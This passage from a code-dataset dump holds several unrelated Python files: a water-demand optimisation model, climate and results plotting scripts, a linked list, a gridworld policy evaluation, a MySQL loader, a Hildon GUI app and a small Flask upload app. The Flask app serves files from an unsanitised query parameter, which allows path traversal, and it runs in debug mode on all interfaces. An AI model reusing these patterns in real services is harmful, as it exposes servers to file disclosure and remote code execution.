initialize=gammas_gw_subset, mutable=True)\n fwm_s.land_constraints = Param(fwm_s.farm_ids, initialize=land_constraints_by_farm_subset, mutable=True)\n fwm_s.water_constraints = Param(fwm_s.farm_ids, initialize=water_constraints_by_farm_subset, mutable=True)\n fwm_s.xs_total = Var(fwm_s.ids, domain=NonNegativeReals, initialize=x_start_values)\n fwm_s.xs_sw = Var(fwm_s.ids, domain=NonNegativeReals, initialize=x_start_values)\n fwm_s.xs_gw = Var(fwm_s.ids, domain=NonNegativeReals, initialize=x_start_values)\n # obs_lu_total = dict(data_profit[\"area_irrigated\"])\n # obs_lu_sw = dict(area_irrigated_sw_farm[\"area_irrigated_sw\"])\n # fwm_s.obs_lu_total = Param(fwm_s.ids, initialize=obs_lu_total, mutable=True)\n # fwm_s.obs_lu_sw = Param(fwm_s.ids, initialize=obs_lu_sw, mutable=True)\n fwm_s.nirs = Param(fwm_s.ids, initialize=nirs_subset, mutable=True)\n\n ## C.2. Constructing model functions:\n def obj_fun(fwm_s):\n return 0.00001 * sum(sum((fwm_s.net_prices_total[h] * fwm_s.xs_total[h] - 0.5 * fwm_s.gammas_total[h] * fwm_s.xs_total[h] * fwm_s.xs_total[h]) for h in fwm_s.crop_ids_by_farm[f]) +\n sum((fwm_s.net_prices_sw[i] * fwm_s.xs_sw[i]) for i in fwm_s.crop_ids_by_farm[f]) +\n sum((fwm_s.net_prices_gw[g] * fwm_s.xs_gw[g]) for g in fwm_s.crop_ids_by_farm[f]) -\n (fwm_s.alphas_sw[f] * sum(fwm_s.xs_sw[s] for s in fwm_s.crop_ids_by_farm[f])) -\n (fwm_s.alphas_gw[f] * sum(fwm_s.xs_gw[s] for s in fwm_s.crop_ids_by_farm[f])) -\n (0.5 * fwm_s.gammas_sw[f] * sum(fwm_s.xs_sw[t] for t in fwm_s.crop_ids_by_farm[f])) * sum(fwm_s.xs_sw[u] for u in fwm_s.crop_ids_by_farm[f]) -\n (0.5 * fwm_s.gammas_gw[f] * sum(fwm_s.xs_gw[t] for t in fwm_s.crop_ids_by_farm[f])) * sum(fwm_s.xs_gw[u] for u in fwm_s.crop_ids_by_farm[f]) for f in fwm_s.farm_ids) # JY double check this!\n fwm_s.obj_f = Objective(rule=obj_fun, sense=maximize)\n\n # def land_constraint(fwm_s, ff):\n # return sum(fwm_s.xs_total[i] for i in fwm_s.crop_ids_by_farm_and_constraint[ff]) <= fwm_s.land_constraints[ff]\n # fwm_s.c1 = Constraint(fwm_s.farm_ids, rule=land_constraint)\n\n def obs_lu_constraint_sum(fwm_s, i):\n return fwm_s.xs_sw[i] + fwm_s.xs_gw[i] == fwm_s.xs_total[i]\n fwm_s.c5 = Constraint(fwm_s.ids, rule=obs_lu_constraint_sum)\n\n def water_constraint(fwm_s, ff):\n return sum(fwm_s.xs_sw[i]*fwm_s.nirs[i]*1000 for i in fwm_s.crop_ids_by_farm_and_constraint[ff]) <= fwm_s.water_constraints[ff]\n fwm_s.c2 = Constraint(fwm_s.farm_ids, rule=water_constraint)\n\n ## C.2.c Creating and running the solver:\n # start_time = datetime.datetime.now()\n opt = SolverFactory(\"ipopt\", solver_io='nl')\n results = opt.solve(fwm_s, keepfiles=False, tee=True)\n print(results.solver.termination_condition)\n end_time = datetime.datetime.now()\n\n ## D.1. Storing main model outputs:\n result_xs_sw = dict(fwm_s.xs_sw.get_values())\n result_xs_gw = dict(fwm_s.xs_gw.get_values())\n result_xs_total = dict(fwm_s.xs_total.get_values())\n\n # JY results stored as pickle file (results_xs.p). Start here and load pickle files.\n with open('result_xs.p', 'rb') as fp:\n result_xs = pickle.load(fp)\n\n # convert result_xs_sw to pandas dataframe and join to data_profit\n if first is True:\n results_pd = data_profit\n results_pd['xs_gw'] = 0\n results_pd['xs_sw'] = 0\n results_pd['xs_total'] = 0\n results_pd['id'] = results_pd['index']\n first = False\n results_xs_sw_pd = pd.DataFrame.from_dict(result_xs_sw, orient='index')\n results_xs_sw_pd['id'] = results_xs_sw_pd.index + 1\n results_xs_sw_pd = results_xs_sw_pd.rename(columns={0: \"xs_sw_temp\"})\n results_pd = results_pd.merge(results_xs_sw_pd[['id','xs_sw_temp']], how='left', on=['id'])\n results_pd.loc[results_pd['xs_sw_temp'].notnull(), 'xs_sw'] = results_pd['xs_sw_temp']\n results_xs_gw_pd = pd.DataFrame.from_dict(result_xs_gw, orient='index')\n results_xs_gw_pd['id'] = results_xs_gw_pd.index + 1\n results_xs_gw_pd = results_xs_gw_pd.rename(columns={0: \"xs_gw_temp\"})\n results_pd = results_pd.merge(results_xs_gw_pd[['id','xs_gw_temp']], how='left', on=['id'])\n results_pd.loc[results_pd['xs_gw_temp'].notnull(), 'xs_gw'] = results_pd['xs_gw_temp']\n results_xs_total_pd = pd.DataFrame.from_dict(result_xs_total, orient='index')\n results_xs_total_pd['id'] = results_xs_total_pd.index + 1\n results_xs_total_pd = results_xs_total_pd.rename(columns={0: \"xs_total_temp\"})\n results_pd = results_pd.merge(results_xs_total_pd[['id','xs_total_temp']], how='left', on=['id'])\n results_pd.loc[results_pd['xs_total_temp'].notnull(), 'xs_total'] = results_pd['xs_total_temp']\n results_pd = results_pd.drop(['xs_gw_temp', 'xs_sw_temp', 'xs_total_temp'], axis=1)\n\n# JY store results into a pandas dataframe\nresults_pd = results_pd.assign(calc_area=result_xs.values())\nresults_pd['calc_gw_demand'] = results_pd['xs_gw'] * results_pd['nir_corrected'] / 25583.64 # unit conversion from acre-ft/year to m3/s; calc area [acres], nir [acre-ft/acres/year]\nresults_pd['calc_sw_demand'] = results_pd['xs_sw'] * results_pd['nir_corrected'] / 25583.64 # unit conversion from acre-ft/year to m3/s; calc area [acres], nir [acre-ft/acres/year]\nresults_pd['calc_total_demand'] = results_pd['xs_total'] * results_pd['nir_corrected'] / 25583.64 # unit conversion from acre-ft/year to m3/s; calc area [acres], nir [acre-ft/acres/year]\nresults_pivot = pd.pivot_table(results_pd, index=['nldas'], values=['calc_gw_demand', 'calc_sw_demand', 'calc_total_demand'], aggfunc=np.sum) #JY demand is order of magnitude low, double check calcs\n\n# JY export results to csv\nresults_pd = results_pd[['nldas','crop','xs_gw','xs_sw','xs_total','nir_corrected']]\nresults_pd.to_csv('/pic/scratch/yoon644/csmruns/wm_abm_run/run/abm_results_'+ str(year_int))\n\n# read a sample water demand input file\nfile = '/pic/projects/im3/wm/Jim/pmp_input_files/RCP8.5_GCAM_water_demand_1980_01_copy.nc'\nwith netCDF4.Dataset(file, 'r') as nc:\n # for key, var in nc.variables.items():\n # print(key, var.dimensions, var.shape, var.units, var.long_name, var._FillValue)\n\n lat = nc['lat'][:]\n lon = nc['lon'][:]\n demand = nc['totalDemand'][:]\n\n# read NLDAS grid reference file\ndf_grid = pd.read_csv('/pic/projects/im3/wm/Jim/pmp_input_files/NLDAS_Grid_Reference.csv')\n\ndf_grid = df_grid[['CENTERX', 'CENTERY', 'NLDAS_X', 'NLDAS_Y', 'NLDAS_ID']]\n\ndf_grid = df_grid.rename(columns={\"CENTERX\": \"longitude\", \"CENTERY\": \"latitude\"})\ndf_grid['longitude'] = df_grid.longitude + 360\n\n# match netCDF demand file and datagrame\nmesh_lon, mesh_lat = np.meshgrid(lon, lat)\ndf_nc = pd.DataFrame({'lon':mesh_lon.reshape(-1,order='C'),'lat':mesh_lat.reshape(-1,order='C')})\ndf_nc['NLDAS_ID'] = ['x'+str(int((row['lon']-235.0625)/0.125+1))+'y'+str(int((row['lat']-25.0625)/0.125+1)) for _,row in df_nc.iterrows()]\ndf_nc['totalDemand'] = 0\n\n# use NLDAS_ID as index for both dataframes\ndf_nc = df_nc.set_index('NLDAS_ID',drop=False)\ntry:\n results_pivot = results_pivot.set_index('nldas',drop=False)\nexcept KeyError:\n pass\n\n# read ABM values into df_nc basing on the same index\ndf_nc.loc[results_pivot.index,'totalDemand'] = results_pivot.calc_sw_demand.values\n\nfor month in months:\n str_year = str(year_int)\n new_fname = '/pic/projects/im3/wm/Jim/pmp_input_files/demand_input/RCP8.5_GCAM_water_demand_'+ str_year + '_' + month + '.nc' # define ABM demand input directory\n shutil.copyfile(file, new_fname)\n demand_ABM = df_nc.totalDemand.values.reshape(len(lat),len(lon),order='C')\n with netCDF4.Dataset(new_fname,'a') as nc:\n nc['totalDemand'][:] = np.ma.masked_array(demand_ABM,mask=nc['totalDemand'][:].mask)\n\nlogging.info('I have successfully written out new demand files for month, year: ' + month + ' ' + year)","sub_path":"MOSART_WM_PMP_stage1_noloop_gwalt2.py","file_name":"MOSART_WM_PMP_stage1_noloop_gwalt2.py","file_ext":"py","file_size_in_byte":23850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"404806841","text":"from csv import reader\nimport matplotlib.pyplot as plt\nfrom calendar import month_name\nfrom collections import deque\n\nstrmax = \"Mean maximum temperature (Degrees C) for years 1859 to 2016 \"\ntmpmax = deque()\nstrmin = \"Mean minimum temperature (Degrees C) for years 1859 to 2016 \"\ntmpmin = deque()\nwith open(\"IDCJCM0037_066062.csv\") as f:\n for row in reader(f):\n if len(row) > 1 and row[0][:30] == strmax[:30]:\n for i in range(12):\n tmpmax.append(float(row[i + 1]))\n if len(row) > 1 and row[0][:30] == strmin[:30]:\n for i in range(12):\n tmpmin.append(float(row[i + 1]))\n if len(tmpmax) and len(tmpmin):\n break\nmintemp = int(min(tmpmin))\nmaxtemp = int(max(tmpmax))\navgmin = (tmpmin[0] + tmpmin[11]) / 2\navgmax = (tmpmax[0] + tmpmax[11]) / 2\ntmpmin.appendleft(avgmin)\ntmpmin.append(avgmin)\ntmpmax.appendleft(avgmax)\ntmpmax.append(avgmax)\nx = [0.5]\nfor i in range(12):\n x.append(i + 1)\nx.append(12.5)\nfig = plt.figure(figsize=(5, 3.5))\nplt.title(\"Mean min and max temperatures in Sydney\", fontsize=10)\nplt.grid(b=True, ls=\"dotted\")\nplt.axis([0.5, 12.5, mintemp - 1, maxtemp + 1])\nplt.plot(x, tmpmin, \"b-\")\nplt.plot(x, tmpmax, \"r-\")\nplt.fill_between(x, tmpmin, tmpmax, color=\"grey\", alpha=\"0.1\")\nxtk = [(i + 1) for i in range(12)]\nplt.xticks(xtk, month_name[1:13], fontsize=8)\nfig.autofmt_xdate(rotation=30)\nytk = []\ni = mintemp\nwhile i <= maxtemp:\n ytk.append(i)\n i += 0.5\nplt.yticks(ytk, fontsize=4)\nplt.show()\n","sub_path":"COMP9021/Lab_6/sydney_temperatures.py","file_name":"sydney_temperatures.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"440163974","text":"class Node:\n\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n\n def __init__(self):\n self.head = None\n\n def print_ll(self):\n temp = self.head\n while temp:\n print(temp.data, end=' ')\n temp = temp.next\n print()\n\n def add_node(self, node, position='end', data=None):\n if position == 'start':\n node.next = self.head\n self.head = node\n elif position == 'between':\n temp = self.head\n while temp.data != data:\n temp = temp.next\n node.next = temp.next\n temp.next = node\n else:\n temp = self.head\n while temp.next != None:\n temp = temp.next\n temp.next = node\n self.print_ll()\n\nif __name__ == '__main__':\n\n # creating a LinkedList with 3 nodes\n ll = LinkedList()\n ll.head = Node(1)\n second = Node(2)\n third = Node(3)\n\n ll.head.next = second\n second.next = third\n\n # traversing through the LinkedList and printing it\n ll.print_ll()\n\n # adding a node to a LinkedList\n # 1. adding to the beginning\n ll.add_node(Node(4), 'start')\n\n # 2. adding somewhere in between, (actually after)\n ll.add_node(Node(5), 'between', 2)\n\n # 3. adding to the end\n ll.add_node(Node(6), 'end')\n","sub_path":"a100DaysOfCode/day3_code/LinkedList/ll.py","file_name":"ll.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"160523650","text":"################################################################################\n##\n# @file plot.py\n# @date 2017-06-27\n# @author Tiago Lobato Gimenes (tlgimenes@gmail.com)\n#\n# @copyright Tiago Lobato Gimenes 2016. All rights reserved.\n# \n# @section DESCRIPTION\n#\n################################################################################\n\nimport os, sys\n\nimport numpy as np\nfrom scipy.interpolate import spline\n\nimport matplotlib.pyplot as plt\n\n################################################################################\n\ndef extract(path, dtype):\n data = []\n\n for filename in os.listdir(path):\n if filename.find(dtype) > -1:\n ff = open(os.path.join(path, filename));\n line = ff.readline()\n while line:\n data.append(int(line));\n line = ff.readline()\n\n ff.close();\n\n return np.average(data), np.std(data);\n\n################################################################################\n\ncurves = {}\n\nfor c in os.listdir('.'):\n if os.path.isdir(c):\n curves[c] = {}\n curves[c]['x'] = np.sort(np.asarray([x for x in os.listdir(c) if os.path.isdir(os.path.join(c,x))], dtype=np.int32))\n curves[c]['security'] = []\n curves[c]['security_std'] = []\n curves[c]['entertainment'] = []\n curves[c]['entertainment_std'] = []\n curves[c]['comfort'] = []\n curves[c]['comfort_std'] = []\n for x in curves[c]['x']:\n median, std = extract(os.path.join(c, str(x)), 'security')\n curves[c]['security'].append(median) \n curves[c]['security_std'].append(std)\n median, std = extract(os.path.join(c, str(x)), 'entertainment')\n curves[c]['entertainment'].append(median) \n curves[c]['entertainment_std'].append(std)\n median, std = extract(os.path.join(c, str(x)), 'comfort')\n curves[c]['comfort'].append(median) \n curves[c]['comfort_std'].append(std)\n\n################################################################################\n\nsecurity = plt.figure().add_subplot(111)\nentertainment = plt.figure().add_subplot(111)\ncomfort = plt.figure().add_subplot(111)\n\nsecurity. set_title('Security')\nentertainment. set_title('Entertainment')\ncomfort. set_title(\"Comfort\")\n\nfor curvename, curve in curves.items():\n xnew = np.linspace(np.min(curve['x']), np.max(curve['x']), 100)\n security. plot(xnew, spline(curve['x'], curve['security'], xnew), label=curvename)\n entertainment. plot(xnew, spline(curve['x'], curve['entertainment'], xnew), label=curvename)\n comfort. plot(xnew, spline(curve['x'], curve['comfort'], xnew), label=curvename)\n #security. errorbar(curve['x'], curve['security'], yerr=curve['security_std'], label=curvename)\n #entertainment. errorbar(curve['x'], curve['entertainment'], yerr=curve['entertainment_std'], label=curvename)\n #comfort. plot(curve['x'], curve['comfort'], label=curvename)\n\nsecurity.legend()\nentertainment.legend()\ncomfort.legend()\n\nplt.show();\n\n################################################################################\n","sub_path":"projeto/log/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"430439319","text":"import numpy as np\r\n\r\n\r\nSIZE = 4\r\n\r\n\r\ndef policy_pi(s):\r\n action_distribution = dict()\r\n action_distribution['up'] = 0.25\r\n action_distribution['down'] = 0.25\r\n action_distribution['right'] = 0.25\r\n action_distribution['left'] = 0.25\r\n return action_distribution\r\n\r\n\r\n\r\ndef grid_p(s, a):\r\n edge = {\r\n 'up': [0, 1, 2, 3],\r\n 'down': [12, 13, 14, 15],\r\n 'right': [3, 7, 11, 15],\r\n 'left': [0, 4, 8, 12],\r\n }\r\n s_prime = -1\r\n if s in edge[a]:\r\n s_prime = s\r\n else:\r\n if a == 'up':\r\n s_prime = s - SIZE\r\n if a == 'down':\r\n s_prime = s + SIZE\r\n if a == 'right':\r\n s_prime = s + 1\r\n if a == 'left':\r\n s_prime = s - 1\r\n probability = 1\r\n reward = -1\r\n return probability, s_prime, reward\r\n\r\n\r\ndef iterative_policy_evaluation(pi, p, gamma=1):\r\n S = [i for i in range(1, 15)]\r\n V = [0 for _ in range(16)]\r\n # V_next = []\r\n actions = ['up', 'down', 'right', 'left']\r\n for i in range(3):\r\n\r\n V_next = [i for i in V]\r\n\r\n for s in S:\r\n update = 0\r\n action_distribution = pi(s)\r\n\r\n for a in actions:\r\n action_probability = action_distribution[a]\r\n transition_probability, s_prime, r = p(s, a)\r\n update += action_probability * transition_probability * \\\r\n (r + gamma * V[s_prime])\r\n V_next[s] = update\r\n\r\n V = V_next\r\n print('iteration:', i)\r\n grid_V = np.array(V).reshape((4, 4))\r\n print(grid_V)\r\n\r\n\r\niterative_policy_evaluation(policy_pi, grid_p)\r\n","sub_path":"__OLD_CODE_STORAGE/reinforcement_learning/dryfeet_simple_coding/iterative_policy_evaluation.py","file_name":"iterative_policy_evaluation.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"140832905","text":"import mysql.connector\nimport database_credentials\n\ndef populate_xref_dimension_tables():\n conn = mysql.connector.connect(user = database_credentials.user, password = database_credentials.password, database = database_credentials.database)\n cursor = conn.cursor()\n truncate_xref_county = ('DELETE FROM XREF_COUNTY')\n truncate_xref_state = ('DELETE FROM XREF_STATE')\n truncate_xref_metro = ('DELETE FROM XREF_METRO')\n truncate_xref_cbsa = ('DELETE FROM XREF_CBSA')\n cursor.execute(truncate_xref_county, ())\n cursor.execute(truncate_xref_state, ())\n cursor.execute(truncate_xref_metro, ())\n cursor.execute(truncate_xref_cbsa, ())\n\n conn.commit()\n\n load_xref_county = (\"\"\"\n INSERT INTO XREF_COUNTY(COUNTY_NAME, COUNTY_REGION_ID_ZILLOW, COUNTY_FIPS) \n SELECT DISTINCT COUNTY_NAME, COUNTY_REGION_ID_ZILLOW, COUNTY_FIPS \n FROM COUNTY_CROSSWALK_STAGING\n \"\"\")\n load_xref_state = (\"\"\"\n INSERT INTO XREF_STATE(STATE_NAME, STATE_FIPS) \n SELECT DISTINCT STATE_NAME, STATE_FIPS \n FROM COUNTY_CROSSWALK_STAGING\n \"\"\")\n load_xref_metro = (\"\"\"\n INSERT INTO XREF_METRO(METRO_NAME_ZILLOW, METRO_REGION_ID_ZILLOW) \n SELECT DISTINCT METRO_NAME_ZILLOW, METRO_REGION_ID_ZILLOW \n FROM COUNTY_CROSSWALK_STAGING\n \"\"\")\n load_xref_cbsa = (\"\"\"\n INSERT INTO XREF_CBSA(CBSA_NAME, CBSA_CODE, FIPS) \n SELECT DISTINCT CBSA_NAME, CBSA_CODE, FIPS\n FROM COUNTY_CROSSWALK_STAGING\n \"\"\")\n\n cursor.execute(load_xref_county, ())\n cursor.execute(load_xref_state, ())\n cursor.execute(load_xref_metro, ())\n cursor.execute(load_xref_cbsa, ())\n\n conn.commit()\n cursor.close()\n conn.close()\n\ndef populate_xref_fact_tables():\n conn = mysql.connector.connect(user = database_credentials.user, password = database_credentials.password, database = database_credentials.database)\n cursor = conn.cursor()\n truncate_xref_metro_cbsa = ('DELETE FROM XREF_METRO_CBSA')\n truncate_xref_metro_cbsa_zhvi_oes = ('DELETE FROM XREF_METRO_CBSA_ZHVI_OES')\n\n cursor.execute(truncate_xref_metro_cbsa, ())\n cursor.execute(truncate_xref_metro_cbsa_zhvi_oes, ())\n\n conn.commit()\n\n load_xref_metro_cbsa = (\"\"\"\n INSERT INTO XREF_METRO_CBSA(METRO_FK, CBSA_FK) \n SELECT DISTINCT M.METRO_PK, C.CBSA_PK\n FROM COUNTY_CROSSWALK_STAGING AS S\n INNER JOIN XREF_METRO AS M\n ON S.METRO_NAME_ZILLOW = M.METRO_NAME_ZILLOW \n AND S.METRO_REGION_ID_ZILLOW = M.METRO_REGION_ID_ZILLOW\n INNER JOIN XREF_CBSA AS C\n ON S.CBSA_NAME = C.CBSA_NAME\n AND S.CBSA_CODE = C.CBSA_CODE\n \"\"\")\n\n load_xref_metro_cbsa_zhvi_oes = (\"\"\"\n INSERT INTO XREF_METRO_CBSA_ZHVI_OES(METRO_FK, CBSA_FK, ZHVI_REGION_FK, OES_METRO_AREA_FK) \n SELECT DISTINCT M.METRO_PK, C.CBSA_PK, R.REGION_PK, OM.METRO_AREA_PK\n FROM XREF_METRO_CBSA AS MC \n INNER JOIN XREF_METRO AS M\n ON M.METRO_PK = MC.METRO_FK \n INNER JOIN XREF_CBSA AS C\n ON C.CBSA_PK = MC.CBSA_FK\n INNER JOIN ZHVI_REGION AS R\n ON R.REGION_ID = M.METRO_REGION_ID_ZILLOW \n INNER JOIN OES_METRO_AREA AS OM\n ON OM.AREA_NAME = C.CBSA_NAME\n \"\"\")\n\n cursor.execute(load_xref_metro_cbsa, ())\n cursor.execute(load_xref_metro_cbsa_zhvi_oes, ())\n\n conn.commit()\n cursor.close()\n conn.close()\n\n","sub_path":"transform_xref_data.py","file_name":"transform_xref_data.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"303147560","text":"from flask import Flask, render_template, request, send_file\nfrom werkzeug.utils import secure_filename\napp = Flask(__name__)\n\n@app.route('/upload')\ndef render_file():\n return render_template('upload.html')\n\n@app.route('/fileUpload', methods = ['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n result = request.form\n\n f = request.files['file']\n t = result.get('title')\n u = result.get('user')\n o = secure_filename(u + '/'+f.filename)\n f.save('imgs' + '/' + o)\n return o + '의 이름으로 저장되었습니다.'\n\n@app.route('/fileLoad')\ndef get_image():\n filename = request.args.get('name')\n return send_file('imgs/' + filename, mimetype='image/png')\n \n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"539114395","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/lib/python2.5/site-packages/mougeon/gui/hildon/mougeonGui.py\n# Compiled at: 2012-03-13 12:39:51\n\"\"\"\nCreated on 01 March 2012 04:19:29\n\n@author: maemo\n\"\"\"\nimport gtk, hildon, logging, os.path, logging, time, datetime, pango, urllib\nfrom mougeon.gui.gtk.widget import *\nfrom mougeon.gui.hildon.widget import *\nfrom mougeon.gui.gtk.utils import fill_widget_with_logo, LOGO_PIXBUF, ORAGNE_PIXBUF, FREE_PIXBUF\nfrom mougeon.gui.hildon.utils import show_about_dialog, call_handled_method, not_yet_implemented, MougeonStackableWindow, ASYNC_EXCEPTION_HANDLER_INSTANCE, AsyncTask, StopSignalException, show_banner_information, show_note_information\nfrom mougeon.core import facade\nfrom mougeon.core.model import ITrackerListener\nfrom mougeon.common import version\nversion.getInstance().submitRevision('$Revision: 48 $')\nfrom mougeon.gui.hildon.portrait import FremantleRotation\ngtk.gdk.threads_init()\n\ndef show_new_window(window):\n program = hildon.Program.get_instance()\n program.add_window(window)\n window.show_all()\n\n\ndef _show_current_operator_view(facade):\n window = CurrentOperatorView(facade)\n show_new_window(window)\n\n\ndef show_current_operator_view(facade):\n call_handled_method(_show_current_operator_view, facade)\n\n\ndef _show_ratio_operator_view(facade):\n window = RatioView(facade)\n show_new_window(window)\n\n\ndef show_ratio_operator_view(facade):\n call_handled_method(_show_ratio_operator_view, facade)\n\n\nclass mougeonGui(object):\n \"\"\"\n This is the GUI of mougeon\n \"\"\"\n _last_folder = None\n\n def __init__(self):\n \"\"\"\n Create a new application GUI\n \"\"\"\n self.program = hildon.Program.get_instance()\n self.facade = facade.mougeon()\n ASYNC_EXCEPTION_HANDLER_INSTANCE.start_async_exception_handler()\n self.facade.start_tracker_record()\n self.init_main_view()\n\n def init_main_view(self):\n \"\"\"\n create a new window for the main view of the application\n \"\"\"\n window = SplashScreenView(self.facade)\n window.connect('destroy', self.quit_application, None)\n show_new_window(window)\n FremantleRotation('mougeon', main_window=window)\n show_current_operator_view(self.facade)\n return\n\n def quit_application(self, widget, data):\n self.facade.stop_tracker_record()\n ASYNC_EXCEPTION_HANDLER_INSTANCE.stop_async_exception_handler()\n gtk.main_quit()\n\n def run(self):\n gtk.main()\n\n\nclass SplashScreenView(MougeonStackableWindow):\n \"\"\"\n This is the first view of the application e.g. the main view. \n \"\"\"\n\n def __init__(self, facade):\n self.facade = facade\n MougeonStackableWindow.__init__(self)\n\n def init_center_view(self, centerview):\n fill_widget_with_logo(centerview)\n\n def _show_current_op_view(self, widget, data):\n call_handled_method(show_current_operator_view, data)\n\n def _show_ratio_op_view(self, widget, data):\n call_handled_method(show_ratio_operator_view, data)\n\n def _reset_data(self, widget, data):\n call_handled_method(self.reset_data, data)\n\n def reset_data(self, facade):\n message = 'This will remove all tracked cell tower. Are you sure?'\n parent = hildon.WindowStack.get_default().peek()\n note = hildon.hildon_note_new_confirmation(parent, message)\n response = gtk.Dialog.run(note)\n note.destroy()\n if response == gtk.RESPONSE_OK:\n facade.reset_data()\n show_banner_information('data cleared')\n\n def init_menu(self, menu):\n currentOpMenuBtn = hildon.GtkButton(gtk.HILDON_SIZE_AUTO)\n currentOpMenuBtn.set_label('Current')\n currentOpMenuBtn.connect('clicked', self._show_current_op_view, self.facade)\n menu.append(currentOpMenuBtn)\n ratioOpMenuBtn = hildon.GtkButton(gtk.HILDON_SIZE_AUTO)\n ratioOpMenuBtn.set_label('Ratio')\n ratioOpMenuBtn.connect('clicked', self._show_ratio_op_view, self.facade)\n menu.append(ratioOpMenuBtn)\n resetMenuBtn = hildon.GtkButton(gtk.HILDON_SIZE_AUTO)\n resetMenuBtn.set_label('Reset...')\n resetMenuBtn.connect('clicked', self._reset_data, self.facade)\n menu.append(resetMenuBtn)\n\n\nclass CurrentOperatorView(MougeonStackableWindow, ITrackerListener):\n \"\"\"\n This view simply show the current used operator\n \"\"\"\n\n def __init__(self, facade):\n self.facade = facade\n MougeonStackableWindow.__init__(self, 'Current Operator')\n self.facade.register_tracker_listener(self)\n self.connect('destroy', self._on_destroy_window_event, None)\n return\n\n def _on_destroy_window_event(self, widget, data):\n self.facade.unregister_tracker_listener(self)\n\n def record_operator(self, tracker, tct):\n gtk.gdk.threads_enter()\n call_handled_method(self.refresh_view)\n gtk.gdk.threads_leave()\n logging.debug('Current operator view updated')\n\n def init_menu(self, menu):\n refreshMenuBtn = hildon.GtkButton(gtk.HILDON_SIZE_AUTO)\n refreshMenuBtn.set_label('Refresh')\n refreshMenuBtn.connect('clicked', self._refresh_view, None)\n menu.append(refreshMenuBtn)\n return\n\n def _refresh_view(self, widget, data):\n call_handled_method(self.refresh_view)\n\n def refresh_view(self):\n for child in self.centerview.get_children():\n logging.debug('removing children from cenetrview...')\n self.centerview.remove(child)\n\n self.init_center_view(self.centerview)\n self.centerview.show_all()\n\n def init_center_view(self, centerview):\n if self.facade.is_using_freemobile():\n fill_widget_with_logo(centerview, FREE_PIXBUF)\n hildon.hildon_play_system_sound('mouton.wav')\n else:\n fill_widget_with_logo(centerview, ORAGNE_PIXBUF)\n hildon.hildon_play_system_sound('pigeon.wav')\n\n\nclass RatioView(MougeonStackableWindow, ITrackerListener):\n \"\"\"\n This view show side by side Free and Orange cell tower usage\n \"\"\"\n\n def __init__(self, facade):\n self.facade = facade\n MougeonStackableWindow.__init__(self, 'Ratio')\n self.facade.register_tracker_listener(self)\n self.connect('destroy', self._on_destroy_window_event, None)\n return\n\n def _on_destroy_window_event(self, widget, data):\n self.facade.unregister_tracker_listener(self)\n\n def record_operator(self, tracker, tct):\n gtk.gdk.threads_enter()\n call_handled_method(self.refresh_view)\n gtk.gdk.threads_leave()\n logging.debug('Ratio view updated')\n\n def init_menu(self, menu):\n refreshMenuBtn = hildon.GtkButton(gtk.HILDON_SIZE_AUTO)\n refreshMenuBtn.set_label('Refresh')\n refreshMenuBtn.connect('clicked', self._refresh_view, None)\n menu.append(refreshMenuBtn)\n return\n\n def _refresh_view(self, widget, data):\n call_handled_method(self.refresh_view)\n\n def refresh_view(self):\n for child in self.centerview.get_children():\n logging.debug('removing children from centerview...')\n self.centerview.remove(child)\n\n self.init_center_view(self.centerview)\n self.centerview.show_all()\n\n def init_center_view(self, centerview):\n centerview.pack_start(self.justifyLeft(gtk.Label('Cell Tower ratio:')), expand=False)\n hbox = gtk.HBox()\n hbox.add(FreeThumbnail(self.facade))\n hbox.add(OrangeThumbnail(self.facade))\n centerview.pack_start(hbox)\n message = 'You are mainly using %s' % self.facade.get_mainly_used_operator().name\n centerview.pack_start(gtk.Label(message))","sub_path":"pycfiles/mougeon-0.1.0dev-r48.linux-armv7l.tar/mougeonGui.py","file_name":"mougeonGui.py","file_ext":"py","file_size_in_byte":7842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"608192477","text":"from pylab import *\n\nparams = { 'backend' : 'ps',\n 'legend.fontsize': 25,\n 'axes.labelsize': 25,\n 'legend.fontsize': 25,\n 'text.fontsize': 25,\n 'font.size': 25,\n 'xtick.labelsize': 25,\n 'ytick.labelsize': 